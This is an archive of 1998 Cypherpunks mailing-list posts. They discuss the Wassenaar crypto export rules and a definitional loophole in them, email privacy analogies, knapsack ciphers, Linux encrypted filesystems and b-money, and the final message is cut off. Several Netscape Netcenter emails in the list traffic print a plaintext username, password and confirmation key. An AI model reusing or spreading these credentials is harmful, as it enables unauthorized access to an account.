Just wondering if there is a URL that describes the proposed strike on
Monday?


    ____________________________________________________________________

           If I can put in one word what has always infuriated me
           in any person, any group, any movement, or any nation,
           it is: bullying
                                                Howard Zinn

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Petro <petro@playboy.com>
Date: Fri, 11 Dec 1998 02:13:12 +0800
To: cyberpunks@Algebra.COM
Subject: Re:
In-Reply-To: <19981209152621.2358.rocketmail@send1e.yahoomail.com>
Message-ID: <v04011700b295a5ba16ae@[207.138.127.230]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:39 PM -0500 12/9/98, Robert Wenzler wrote:
>HaB wrote:
><snip>
>>     That's a good place to begin, though.  "Would you send a letter to
>> someone without an envelope?"  "Then why not put your email in the
>> electronic equivalent of one?"
>>
>> balance.
>
>Would I send a letter to someone without an envelope?
>One word: postcard.

	How often do you do this, and how much information do you add to
what is already there?

	Beyond "The scenery is here, wish you were beautiful", how much of
your life story would you circulate on a postcard?
--
"To sum up: The entire structure of antitrust statutes in this country is a
jumble of economic irrationality and ignorance. It is a product: (a) of a
gross misinterpretation of history, and (b) of rather nave, and certainly
unrealistic, economic theories." Alan Greenspan, "Anti-trust"
http://www.ecosystems.net/mgering/antitrust.html

Petro::E-Commerce Adminstrator::Playboy Ent. Inc.::petro@playboy.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 11 Dec 1998 01:21:19 +0800
To: "Bernardo B. Terrado" <cypherpunks@toad.com
Subject: Re: knapsack....
In-Reply-To: <Pine.GSO.3.96.981208170008.2860A-100000@mudspring.uplb.edu.ph>
Message-ID: <19981210114517.A8878@weathership.homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Chor-Rivest was broken at Crypto98.  Don't use any knapsack
algorithms.

Adam


On Tue, Dec 08, 1998 at 05:04:22PM +0800, Bernardo B. Terrado wrote:
| Where could I find the algorithm (per se) for
| Merkle-Hellman knapsack ?
| (if it is not for free just say so) :)
| 
| I've read in Mr. Schneier's book that Chor-Rivest knapsack is secure
| (unless for some specializerd attack). Is it still as secure today as the
| latter years?
| 
| 
| 
| 
| 
| 
| 
| Bernie
| 

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Fri, 11 Dec 1998 03:39:53 +0800
To: ravage@EINSTEIN.ssz.com (Jim Choate)
Subject: Re: What's up with the blank traffic from algebra.com?
In-Reply-To: <199812101555.JAA23959@einstein.ssz.com>
Message-ID: <199812101845.MAA13298@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



send the sample messages to me

igor

Jim Choate wrote:
> 
> 
> Hi,
> 
> Anyone know why algebra.com is throwing the blank messages over the last
> couple of days?
> 
> 
>     ____________________________________________________________________
> 
>            If I can put in one word what has always infuriated me
>            in any person, any group, any movement, or any nation,
>            it is: bullying
>                                                 Howard Zinn
> 
>        The Armadillo Group       ,::////;::-.          James Choate
>        Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
>        www.ssz.com            .',  ||||    `/( e\      512-451-7087
>                            -====~~mm-'`-```-mm --'-
>     --------------------------------------------------------------------
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Max Inux <maxinux@bigfoot.com>
Date: Fri, 11 Dec 1998 03:10:14 +0800
To: Multiple recipients of list <cypherpunks@openpgp.net>
Subject: COMMENT: Minimum Security Devices and Procedures and Bank Secrecy
Message-ID: <Pine.LNX.4.02.9812101127140.26823-100000@khercs.chipware.net>
MIME-Version: 1.0
Content-Type: text/plain



A letter someone CC'ed to dc-stuff, we seem to be having the same
conversations there and here...  Waasenaar and FDIC "Know your customer"


--   Max Inux <maxinux@openpgp.net>  Hey Christy!!! KeyID 0x8907E9E5
Kinky Sex makes the world go round O R Strong crypto makes the world safe
       If crypto is outlawed only outlaws will have crypto
Fingerprint(Photo Also): 259D 59F7 D98C CD73 1ACD 54Ea 6C43 4877 8907 E9E5



---------- Forwarded message ----------
Date: Thu, 10 Dec 1998 07:13:55 -0800 (PST)
X-Loop: openpgp.net
From: KAT in the HAT <katinthehat@rocketmail.com>
To: comments@FDIC.gov
Subject: COMMENT: Minimum Security Devices and Procedures and Bank Secrecy Act 

I would like to state that this is the most Orwellian, privacy-invading,
search-without-a-warrant, snoopy regulation I have ever seen.  I believe it is
a horrible idea that should never be allowed.  I am growing so tired of my
government trying to monitor it's every citizen's every move just in case
there may be a criminal act committed.  

Every citizen is innocent until proven guilty and has a right to privacy
against such causeless searches.  As the 4th amendment to the Constitution of
the United States says (have you ever heard of it?): 

"The right of the people to be secure in their persons, houses,
papers, and effects, against unreasonable searches and seizures,
SHALL NOT BE VIOLATED, and no warrants shall issue, but upon probable
cause, supported by oaths and affirmation, and particularly describing
the place to be searched, and the persons or things to be seized."

What you advocate is a warrantless search of all my financial papers and
effects without probable cause or evidence of any sort of crime being
committed.  This kind of nosy government action is exactly the kind of thing
that should never be allowed in a free state.  I will fight to keep my nation
from becoming a 24- hour-a-day, 7-days-a-week monitored police state until my
last breath.

I urge you to vote against this ghastly measure and to banish it and any act
like it to the trashcan.  The citizens of the United States deserve better
than to be treated like children watched over by Mother Government.  

If this act is passed, I know what my response will be.  I will promptly
withdraw all my monies from any institution that follows these regulations,
refuse to do any sort of business with them, and urge all my friends and
family to do the same.  I know that many others will do the same without
hesitation.  

Try explaining to your member and nonmember banks why there is such a sudden
cash shortage and why they are losing customers left and right.  This act
would undoubtedly trigger a nationwide economic crisis as people withdrew from
a banking system that had become a puppet of law enforcement and Big Brother. 
We must be able to TRUST our banks with our money.  WE are the customers and
any bank that holds goverment surveillance above my trust is no bank that I
will do business with.

I will simply take my paychecks each month and cash them in their entirety and
then do what I want, when I want, unwatched, with my money.  I will not be
surveilled by Big Brother under the guise of protecting me against shadowy
criminals.  

I value my privacy highly, not because I am a criminal, but because I am a
free American, and such privacy is guaranteed to me by our highest legal
document (the Constitution).  I recommend the FDIC members read it sometime,
because obviously they never have before, or this ludicrous act would have
never even been proposed.

Simply put, this is the worst idea I have ever heard and strongly urge its
defeat and nonadoption.  Thank you.

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
The masters of technology will have to be lighthearted and intelligent.
The machine easily masters the grim and the dumb. --Marshall McLuhan
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Wenzler <rwenzler@usachoice.com>
Date: Fri, 11 Dec 1998 04:08:53 +0800
To: Mbishop645@aol.com
Subject: Re:
In-Reply-To: <ed7e707c.366f85d7@aol.com>
Message-ID: <3670195D.F23CEDF6@usachoice.com>
MIME-Version: 1.0
Content-Type: text/plain





Mbishop645@aol.com wrote:
> 
> >HaB wrote:
> ><snip>
> >>     That's a good place to begin, though.  "Would you send a letter to
> >> someone without an envelope?"  "Then why not put your email in the
> >> electronic equivalent of one?"
> >>
> >> balance.
> >
> >Would I send a letter to someone without an envelope?
> >One word: postcard.
> 
> Ahh, but would you tape a check for your phone bill to a postcard? Other
> than writing a greeting to someone what else do you use a postcard for?

No, I would not tape a phone bill check to a postcard. There is the 
chance for it to fall off.

There is different methods of sending mail for different levels of
security and functionality. Some people make it obvious what is inside
an envelope. (who would not recognize a Christmas card from the
envelope?) Others make it as bland and normal as possible to
have it go by without much notice.

It all depends on how secure you want it. Some things you can do
with what amounts to postcard security.

What amount of security do you want for your email? Would you be
willing to do something extra for that security?

This type of question is up to each person. How much risk is the
person willing to take. Each person has the responsibility to
understand what the risks are and to decide what risks they are
willing to take.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jan Garefelt <jang@pobox.se>
Date: Fri, 11 Dec 1998 00:29:38 +0800
To: cypherpunks@toad.com
Subject: The new Wassenaar regulations; here they are
Message-ID: <366FEA7B.5552AB64@pobox.se>
MIME-Version: 1.0
Content-Type: text/plain



Web version:
 http://www.fitug.de/news/wa/

Word- or RTF-version:
 http://www.wassenaar.org/List/

Cheers /Jan Garefelt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Fri, 11 Dec 1998 01:19:13 +0800
To: cypherpunks@cyberpass.net
Subject: strange posts
Message-ID: <366FF7EE.3350F28E@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



I obtained a bunch of totally EMPTY posts from

      owner-cypherpunks@Algebra.COM

in intervals of about half an hour. Does anyone have the same
experience and know what's the matter? (Further it appears that
a couple of posts of mine have been delayed and have not yet appreared
after the usual waiting time.)

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Fri, 11 Dec 1998 01:52:34 +0800
To: Cypherpunks@toad.com
Subject: Re:
Message-ID: <199812101653.RAA02619@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



So you'd be happy to staple a check or money order for a bill to a
postcard and send it off?  Are you trying to be obtuse, or is it
just a natural phenomenon with you?


At 06:39 PM 12/9/98 -0500, Robert Wenzler wrote:
>
>
>HaB wrote:
><snip>
>>     That's a good place to begin, though.  "Would you send a letter to
>> someone without an envelope?"  "Then why not put your email in the
>> electronic equivalent of one?"
>> 
>> balance.
>
>Would I send a letter to someone without an envelope?
>One word: postcard.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ben Laurie <ben@algroup.co.uk>
Date: Fri, 11 Dec 1998 03:58:31 +0800
To: "Ulf Mller" <ulf@fitug.de>
Subject: Re: Wassenaar summary (and a funny new loophole)
In-Reply-To: <199812101815.TAA120782@public.uni-hamburg.de>
Message-ID: <36701BB5.BB2D78CC@algroup.co.uk>
MIME-Version: 1.0
Content-Type: text/plain



Ulf Mller wrote:
> Since the definition differentiates algorithms by symmetry rather than by
> their cryptographic properties, there is no restriction whatsoever on
> asymmetric secret-key encryption algorithms. Those algorithms typically
> are not based on factorization or discrete logarithms. That is, they are
> no longer controlled by the Wassenaar arrangement.

Hmm - so if I defined a new crytpo algorithm, SED3, say, that looks like
this:

SED3(k,x)=3DES(backwards(k),x)

where backwards(k) is k with its bits written backwards, then the
3DES/SED3(k1,k2) combination is exportable (where k1 is related to k2,
of course, by k2=backwards(k1))?

Cheers,

Ben.

-- 
Ben Laurie            |Phone: +44 (181) 735 0686| Apache Group member
Freelance Consultant  |Fax:   +44 (181) 735 0689|http://www.apache.org/
and Technical Director|Email: ben@algroup.co.uk |
A.L. Digital Ltd,     |Apache-SSL author     http://www.apache-ssl.org/
London, England.      |"Apache: TDG" http://www.ora.com/catalog/apache/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ulf@fitug.de (Ulf =?iso-8859-1?Q?M=F6ller?=)
Date: Fri, 11 Dec 1998 03:20:20 +0800
To: cypherpunks@toad.com
Subject: Wassenaar summary (and a funny new loophole)
In-Reply-To: <199812101320.IAA12597@smtp1.mindspring.com>
Message-ID: <199812101815.TAA120782@public.uni-hamburg.de>
MIME-Version: 1.0
Content-Type: text/plain



> The Wassenaar Arrangement has put up the Dec. 3 lists
> agreed to by members:

To summarize the crypto rules:

Software is freely exportable if it has been made available without
restrictions upon its further dissemination. Copyright restrictions
do not count.

Mass market cryto software is no longer covered by the General Software
Note, but by a Cryptography Note. Under that note, mass market software
and hardware is not controlled if it does not use symmetric keys longer
than 64 bits and the cryptographic functionality cannot easily changed
by the user.

Systems that do not meet those conditions are export-controlled if they
use symmetric encryption with more than 56 bit keys, algorithms based 
on factorization or on logarithms in finite fields with more than 512
bit keys (e.g. RSA, DH) or on discrete logarithms in other groups (such
as elliptic curves) with more than 112 bits. They may be exported for
personal use.

There are exceptions for execution of copy-protected software and
read-only media and for phones without end-to-end encryption.


The list contains an amusing editorial error which would for the first
time allow the export of strong crypto hardware. "Symmetric algorithm"
is defined to mean 'a cryptographic algorithm using an identical key for
both encryption and decryption', whereas an algorithm using 'different
mathematically-related keys for encryption and decryption' is an "asymmetric
algorithm".

Since the definition differentiates algorithms by symmetry rather than by
their cryptographic properties, there is no restriction whatsoever on
asymmetric secret-key encryption algorithms. Those algorithms typically
are not based on factorization or discrete logarithms. That is, they are
no longer controlled by the Wassenaar arrangement.

Better yet, mass-market crypto systems are not controlled if they
'do not contain a "symmetric algorithm" employing a key length exceeding
64 bits'. So you can use, say, 2048 bit RSA with an asymmetric secret-key
algorithm of 128 bit key length (so the system does not contain a symmetric
algorithm), and you're free to export it.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@video-collage.com>
Date: Fri, 11 Dec 1998 16:25:31 +0800
To: cypherpunks-outgoing@video-collage.com
Subject: test2
Message-ID: <199812110738.CAA28223@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain


test




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@video-collage.com>
Date: Fri, 11 Dec 1998 22:13:54 +0800
To: cypherpunks@video-collage.com
Subject: test4
Message-ID: <199812111331.IAA12442@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



test4




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Igor Chudov <ichudov@video-collage.com>
Date: Fri, 11 Dec 1998 22:17:39 +0800
To: cypherpunks@video-collage.com
Subject: test4
Message-ID: <199812111337.IAA13010@mail.video-collage.com>
MIME-Version: 1.0
Content-Type: text/plain



test4




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wilson, Jamie (J.R.)" <jwilso37@visteonet.com>
Date: Fri, 11 Dec 1998 22:23:28 +0800
To: "'cypherpunks@toad.com>
Subject: RE: Postcard Debates
Message-ID: <199812111341.IAA15146@mailfw1.ford.com>
MIME-Version: 1.0
Content-Type: text/plain



If everyone just encrypted their messages then no suspicions would be raised
regarding the use of encryption.  Most people use envelopes, plain and
simple -- and as a result no one questions what they are hiding.  It's
understood that mail is private and therefore people have a right to seal it
in an envelope and not worry about people tampering with it.  On the same
note, there are federal regulations and penalties (in the U.S. anyway) for
tampering with mail and interrupting the delivery of it.  The same laws
should apply to email.

____________________________________________________
Jamie R. Wilson                     



-----Original Message-----
From: Robert Wenzler [mailto:rwenzler@usachoice.com]
Sent: Thursday, 10 December, 1998 13:56
To: Mbishop645@aol.com
Cc: maven@weirdness.com; hab@gamegirlz.com; Cypherpunks@toad.com
Subject: Re: 




Mbishop645@aol.com wrote:
> 
> >HaB wrote:
> ><snip>
> >>     That's a good place to begin, though.  "Would you send a letter to
> >> someone without an envelope?"  "Then why not put your email in the
> >> electronic equivalent of one?"
> >>
> >> balance.
> >
> >Would I send a letter to someone without an envelope?
> >One word: postcard.
> 
> Ahh, but would you tape a check for your phone bill to a postcard? Other
> than writing a greeting to someone what else do you use a postcard for?

No, I would not tape a phone bill check to a postcard. There is the 
chance for it to fall off.

There is different methods of sending mail for different levels of
security and functionality. Some people make it obvious what is inside
an envelope. (who would not recognize a Christmas card from the
envelope?) Others make it as bland and normal as possible to
have it go by without much notice.

It all depends on how secure you want it. Some things you can do
with what amounts to postcard security.

What amount of security do you want for your email? Would you be
willing to do something extra for that security?

This type of question is up to each person. How much risk is the
person willing to take. Each person has the responsibility to
understand what the risks are and to decide what risks they are
willing to take.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 11 Dec 1998 22:50:03 +0800
To: cypherpunks@cyberpass.net
Subject: Re: alternative b-money creation
In-Reply-To: <19981210190344.A20157@eskimo.com>
Message-ID: <v04020a30b296d35bf746@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



I have to agree with Bill here.

It's kind of hard to call something "money" if you can't exchange it for
other things which also call themselves "money".

;-).

Cheers,
Robert Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Sat, 12 Dec 1998 02:13:32 +0800
To: users@EINSTEIN.ssz.com (SSZ User Mail List)
Subject: SSZ had ISDN problems this AM...
Message-ID: <199812111710.LAA29487@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text




Hi,

Because of the weather change here there was an outage of ISDN
connectivity at my ISP. It seems to be back now. No idea if it will return
in the next day or so.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Sat, 12 Dec 1998 02:45:38 +0800
To: cypherpunks@cyberpass.net
Subject: Bruce Taylor ed -Reply
Message-ID: <v04020a3ab29700f1aeb5@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


Mime-Version: 1.0
Date:         Fri, 11 Dec 1998 11:44:05 -0500
Reply-To: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
Sender: Law & Policy of Computer Communications
              <CYBERIA-L@LISTSERV.AOL.COM>
From: Dan L Burk <BURKDANL@SHU.EDU>
Subject:      Bruce Taylor ed -Reply
To: CYBERIA-L@LISTSERV.AOL.COM

>>> Filtering Facts <burt@NORTHWEST.COM> 12/10/98 07:58pm >>>

>How is it that you guys all missed the ed. by Bruce Taylor in USA Today
>last week?  Especially since it contained a plug for me. ;->

Sorry, I probably filtered it out.  I've had "Bruce Taylor" in my mental
bozofilter ever since he used to work for Charles Keating.  The only thing
that's changed since then is that (so far as I know) Bruce no longer
relies on pilfered S&L funds for his crusades.

Now how's that for a filtering fact?

----------------------------
Dan L. Burk
Seton Hall University
burkdanl@shu.edu
----------------------------

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Brown, R Ken" <brownrk1@texaco.com>
Date: Sat, 12 Dec 1998 03:14:58 +0800
To: "Brown, R Ken" <cypherpunks@EINSTEIN.ssz.com>
Subject: Mornington Crescent Explained (was RE: Global Strike to protest Wassenaar)
Message-ID: <896C7C3540C3D111AB9F00805FA78CE2013F861B@MSX11002>
MIME-Version: 1.0
Content-Type: text/plain



> Ben[SMTP:ben@edelweb.fr] wrote, in reply to me replying to Richard Bragg:
> 
>> >  Ever played Mornington Crescent?  Try the same thing with
>> >  e-mail.   The idea is that only those in the game know "the rules".
>> >  These rules can change at any time in any way and all
>> >  "real players" can tell about the new "rules" and adjust accordingly.
>> 
>> showing of course that he either doesn't know the *real*  rules of
>> Mornington Crescent or else (more likely) doesn't want to reveal them!
Oh,
>> and this posting quite clearly wins this round - even with the new DLR
>> extensions and the Elverson Road footbridge:-)  

>Ok Ken--you didn't get 'Soccer Moms', now us Yanks don't get 'Mornington 
>Crescent'.  You want to explain to the list?

Well, you *did* ask. Don't blame me. 

It is summed up well at:
http://vortex.hawo.stw.uni-erlangen.de/~asheiduk/pgg/06S/06S008.html

or, more prosaically, at:
http://www.geocities.com/CapitolHill/Senate/6270/ed_morning.htm

Straight from the horse's mouth:
http://news.bbc.co.uk/hi/english/uk/newsid_79000/79273.stm

A transcript of an actual game can be found at:
http://www.lazarus.demon.co.uk/mc/mc100.html - he also has many other links
at: http://www.lazarus.demon.co.uk/mc/mc.html

The Encyclopaedia Morningtonia has more detail than anyone in their right
brain would want to know about the game  at:
http://aurora.york.ac.uk/mc_em.html

Here are the rules of a slightly different game that Richard may have been
thinking of:
http://members.xoom.com/mornomic/ruleset.html and
http://www.cms.dmu.ac.uk/~c94kd/mornomic/ruleset.txt


Ken 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Gorsuch <mikeg@soonernet.com>
Date: Sat, 12 Dec 1998 04:00:47 +0800
To: cypherpunks@toad.com
Subject: Linux Encrypted File Sytem
Message-ID: <XFMail.981211124103.mikeg@soonernet.com>
MIME-Version: 1.0
Content-Type: text/plain



Hey guys,

I'm hoping that you guys can point me in the right direction.  I have become
very interested in the idea of an encrypted file system, rather than encrypting
individual files.  I read an article in the Linux Journal that talked about how
to give Linux the support.  Well, first I had to get the source for an older
kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I was
supposed to patch mount.  The problem I am facing is that the mount source will
not take the patch right.  

If anyone can help me on these two issues I would be very happy:

1) What source version of mount do I need to use?

2) Is there a way to get kernel 2.0.35 or later to use this support?

Mike


-----------------------------------------------------------------------------
"The Darkest Hour is Always Just Before Dawn..."

Mike Gorsuch
aka Wulfgang
ICQ UIN 670820
email: mikeg@soonernet.com
Web Page: http://www.geocities.com/Area51/Rampart/6071
------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aladdin Customer Service <cust.service@orca.aladdinsys.com>
Date: Sat, 12 Dec 1998 06:07:06 +0800
To: Cypher Punks <cypherpunks@toad.com>
Subject: Thank you for downloading DropStuff
Message-ID: <199812112113.NAA14027@opal.he.net>
MIME-Version: 1.0
Content-Type: text/plain




Dear Cypher Punks,

Thank you for downloading Aladdin
DropStuff with Expander Enhancer 4.5. 
(If you had any problems downloading the
software, please contact Aladdin Customer 
Service by sending an email to 
service@aladdinsys.com.)


As you know, DropStuff is shareware, 
and you may try the software out for up 
to 15 days with no obligation. After
that, please register DropStuff 4.5 by 
using our onlineregistration form, 
available on the Aladdin web site at:

http://www.aladdinsys.com/store/

At Aladdin, we believe in maintaining a 
close relationship with our customers. 
What you think about us and our products 
is important to us. From time to time, we 
send out surveys about Aladdin, our 
products and service as a means of improving 
your experience with us. We hope that you 
will take a few minutes to respond to these 
surveys.

When you become a registered user of 
DropStuff 4.5, you'll be entitled to 
special value offers on Aladdin products, 
we'll notify you of upgrades, special 
updates and events and provide you the 
excellent technical support for which we're 
famous.

We hope you enjoy using your new copy of 
DropStuff with Expander Enhancer 4.5.

Thank you,

Marty McGillivray
Product Manager
The StuffIt Family of Products
Aladdin Systems, Inc.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 07:08:42 +0800
To: cypherpunks@toad.com
Subject: Your Postal Code
Message-ID: <199812112139.NAA08898@ureg3.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Monica Lewinsky,

You have received this email because you had requested Netcenter to 
mail you the postalcode used in your Netcenter registration. 

We have your postalcode as: "90024"

You can use this postal code to obtain your password or username. 
If it is not your correct postal code, please update it (and
any other out-of-date information) in the Netcenter Member Center.

Thanks,
Netcenter Registration

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 07:34:28 +0800
To: cypherpunks@toad.com
Subject: NETCENTER uid=cpunksusa key=cnO6Eb3peBen CONFIRM!
Message-ID: <199812112143.NAA09119@ureg3.netscape.com>
MIME-Version: 1.0
Content-Type: text/html


 

Dear Monica Lewinsky, 

Welcome to Netcenter! In order to gain full access to Netcenter
member services, please CONFIRM that this is your correct email
address by replying to this message within 48 hours.

You can reply by:

1. Clicking Reply and Send to return this email to Netcenter
               
      OR

2. If you CAN YOU SEE THE IMAGE BELOW, just click on the image to
   confirm your account.

<A HREF=
http://ureg.netscape.com/iiop/UReg2/mailback/confirm_email_form?uid=cpunksusa&key=cnO6Eb3peB&U2_CS=iso-8859-1&U2_LA=en>


If you did not request this account, do not respond. Simply delete
this message from your mailbox. If you do not respond, your account
will not be activated. 


Thank You! 

Netcenter Registration 







 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 07:16:43 +0800
To: cypherpunks@toad.com
Subject: Netcenter member information
Message-ID: <199812112143.NAA07661@ureg2.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Monica Lewinsky,

You have received this email because you had requested a new Netcenter 
password. In order to protect your account, we urge you to change your 
password after you login using the password specified below.

    username=cpunksusa
    password=bluefire433

To change your password, visit the Netcenter Member Center at the 
following location: 

    http://home.netscape.com/netcenter/membercenter.html

You may be asked to sign in, and then to log in using the password above.
Then just click on the "password" link in the left column, and follow the
instructions to change your password. When you're done, click the "update"
button, and you can start using your new password right away.

Thanks, 
  
Netcenter Registration

 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Sat, 12 Dec 1998 05:00:10 +0800
To: mikeg@soonernet.com
Subject: Re: Linux Encrypted File Sytem
In-Reply-To: <XFMail.981211124103.mikeg@soonernet.com>
Message-ID: <199812111945.NAA16936@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Did you try CFS? It does not require any patches to the kernel or 
the mount program.

igor

Mike Gorsuch wrote:
> 
> 
> Hey guys,
> 
> I'm hoping that you guys can point me in the right direction.  I have become
> very interested in the idea of an encrypted file system, rather than encrypting
> individual files.  I read an article in the Linux Journal that talked about how
> to give Linux the support.  Well, first I had to get the source for an older
> kernel, 2.0.30, and use the patches.  It patched and compiled fine. Next I was
> supposed to patch mount.  The problem I am facing is that the mount source will
> not take the patch right.  
> 
> If anyone can help me on these two issues I would be very happy:
> 
> 1) What source version of mount do I need to use?
> 
> 2) Is there a way to get kernel 2.0.35 or later to use this support?
> 
> Mike
> 
> 
> -----------------------------------------------------------------------------
> "The Darkest Hour is Always Just Before Dawn..."
> 
> Mike Gorsuch
> aka Wulfgang
> ICQ UIN 670820
> email: mikeg@soonernet.com
> Web Page: http://www.geocities.com/Area51/Rampart/6071
> ------------------------------------------------------------------------------
> 



	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: netcenter-reg@netscape.com (Netcenter Registration)
Date: Sat, 12 Dec 1998 06:47:11 +0800
To: cypherpunks@toad.com
Subject: Welcome to Netcenter
Message-ID: <199812112147.NAA04962@ureg1.netscape.com>
MIME-Version: 1.0
Content-Type: text/plain



Dear Monica Lewinsky,

Welcome to NETSCAPE NETCENTER, where you can
access all the Internet services you need in
one convenient location. With your FREE enrollment
in Netscape Netcenter, you're joining millions of
others who've already discovered the Internet's
best resource for software, content, commerce,
and community.

YOUR FREE EMAIL ACCOUNT
**************************************************
As a bonus, we have automatically reserved for you
your own private Netscape WebMail account:

cpunksusa@netscape.net

Netscape WebMail accounts, provided free to all 
Netcenter members, are accessible from any computer
with internet access.  You can activate your
WebMail account here:

http://home.netscape.com/netcenter/mail/index.html

IMPORTANT MEMBERSHIP INFORMATION
**************************************************
Each time you visit us at Netscape Netcenter, you 
will enter your user name and password. Our records 
now indicate:

Your User Name is: cpunksusa

Please keep this information for future reference.

BEST OF THE NET
**************************************************
With your Netscape Netcenter membership, you'll be
able to take advantage of a broad variety of 
business and consumer channels like news, sports 
and personal finance; outstanding products from 
leading companies such as Music Boulevard, 
Travelocity, Amazon.com, and FTD; and integrated 
services like personalization to give you the
information you want, when you want it.

And, there's more! We'll send you a periodic email 
newsletter featuring all the latest information on 
the specials, services and products available to you.
It will keep you informed of the frequent updates and
new services being added to Netcenter.

Thank you for becoming a member of Netscape 
Netcenter, your home on the Net.

The Netcenter Team

http://home.netscape.com/netcenter

NETSCAPE NETCENTER
**************************************************
Netsearch: http://home.netscape.com/escapes/search/netsearch_0.html

WebMail:
http://home.netscape.com/netcenter/mail/index.html

Personalize:
http://my.netscape.com/index.html

Member Directory:
http://home.netscape.com/memberdirectory


**************************************************
Netscape respects your online time and Internet 
privacy. This welcome letter is a one-time only 
mailing. If you would like to subscribe or 
unsubscribe to other Netscape or partner mailings, 
please visit our In-Box Direct service.

http://form.netscape.com/ibd/cgi-bin/ibd-x.cgi

Copyright (c) 1998.  Netscape Communications 
Corporation.  All rights reserved




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Wei Dai <weidai@eskimo.com>
Date: Sat, 12 Dec 1998 07:18:34 +0800
To: cypherpunks@cyberpass.net
Subject: Re: alternative b-money creation
In-Reply-To: <199812060008.AAA27126@server.eternity.org>
Message-ID: <19981211135656.A13424@eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, Dec 11, 1998 at 02:27:10AM -0800, bill.stewart@pobox.com wrote:
> It still doesn't solve the fundamental problem with the b-money idea,
